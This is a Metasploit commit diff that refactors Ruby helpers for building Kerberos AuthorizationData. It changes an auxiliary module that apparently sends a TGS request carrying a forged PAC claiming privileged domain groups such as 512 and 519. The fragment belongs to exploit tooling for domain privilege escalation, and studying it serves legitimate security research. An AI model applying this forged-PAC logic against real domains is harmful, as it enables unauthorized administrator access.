Build AuthorizationData from the module

bug/bundler_fix
jvazquez-r7 2014-12-19 18:58:06 -06:00
parent 9bd454d288
commit e6781fcbea
3 changed files with 20 additions and 23 deletions

View File

@ -69,6 +69,20 @@ module Msf
pac_type
end
def build_authorization_data(opts)
pac = opts[:pac] || ''
pac_auth_data = Rex::Proto::Kerberos::Model::AuthorizationData.new(
elements: [{:type => Rex::Proto::Kerberos::Pac::AD_WIN2K_PAC, :data => pac}]
)
authorization_data = Rex::Proto::Kerberos::Model::AuthorizationData.new(
elements: [{:type => Rex::Proto::Kerberos::Model::AD_IF_RELEVANT, :data => pac_auth_data.encode}]
)
authorization_data
end
end
end
end

View File

@ -16,14 +16,6 @@ module Msf
realm = opts[:realm] || ''
sname = opts[:sname] || build_server_name(opts)
#pac = build_pac(opts)
#opts.merge!({:pac => pac.encode})
auth_data = build_authorization_data(opts)
opts.merge!({:auth_data => auth_data})
subkey = Rex::Proto::Kerberos::Model::EncryptionKey.new(
type: 23,
#value: Rex::Text.rand_text(16)
@ -32,7 +24,9 @@ module Msf
opts.merge!({:subkey => subkey})
if opts[:auth_data]
enc_auth_data = build_enc_auth_data(opts)
end
body = Rex::Proto::Kerberos::Model::KdcRequestBody.new(
options: options,
@ -87,19 +81,6 @@ module Msf
e_data
end
def build_authorization_data(opts)
pac = opts[:pac] || ''
pac_auth_data = Rex::Proto::Kerberos::Model::AuthorizationData.new(
elements: [{:type => Rex::Proto::Kerberos::Pac::AD_WIN2K_PAC, :data => pac}]
)
authorization_data = Rex::Proto::Kerberos::Model::AuthorizationData.new(
elements: [{:type => Rex::Proto::Kerberos::Model::AD_IF_RELEVANT, :data => pac_auth_data.encode}]
)
authorization_data
end
# Builds a kerberos pre authenticated information structure for an TGS request
#
# @param opts [Hash]

View File

@ -72,6 +72,8 @@ class Metasploit4 < Msf::Auxiliary
logon_time: logon_time,
)
auth_data = build_authorization_data(pac: pac.encode)
res = send_request_tgs(
client_name: 'juan',
server_name: 'krbtgt/DEMO.LOCAL',
@ -82,7 +84,7 @@ class Metasploit4 < Msf::Auxiliary
ticket: ticket,
group_ids: [513, 512, 520, 518, 519],
domain_id: 'S-1-5-21-1755879683-3641577184-3486455962',
pac: pac.encode
auth_data: auth_data
)
unless res.msg_type == 13